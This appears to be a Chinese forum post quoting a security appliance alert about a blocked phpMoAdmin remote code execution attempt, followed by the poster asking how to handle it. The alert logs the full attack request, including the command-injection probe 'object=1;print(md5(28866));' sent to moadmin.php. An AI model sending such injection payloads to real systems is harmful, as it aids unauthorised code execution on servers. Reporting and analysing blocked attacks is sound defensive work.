PHPMoAdmin - 未经授权的远程代码执行
防护状态
已防护 (该漏洞已被本设备防护,具体参见:安全防护策略:MCU服务器;策略开启的防护类型:系统命令注入。)
详细信息
phpMoAdmin 1.1.2中moadmin.php中的saveObject函数允许远程攻击者通过object参数中的shell元字符执行任意命令
REQUEST: POST /ajax/moadmin.php HTTP/1.1 Host: zyysyjs.xxsssz.cn:8880 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Content-Length: 28 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.9 Content-Type: application/x-www-form-urlencoded Cookie: JSESSIONID=5F909388F35377BA78A23511EB985868 Origin: http://zyysyjs.xxsssz.cn:8880 Referer: http://zyysyjs.xxsssz.cn:8880/admin/index X-Requested-With: XMLHttpRequest Accept-Encoding: gzip object=1;print(md5(28866)); RESPONSE: HTTP/1.1 200 Content-Type: text/html;charset=UTF-8 Content-Length: 15 Date: Mon, 04 Sep 2023 02:21:26 GMT redirectToLogin
有朋友知道怎么处理这个问题吗?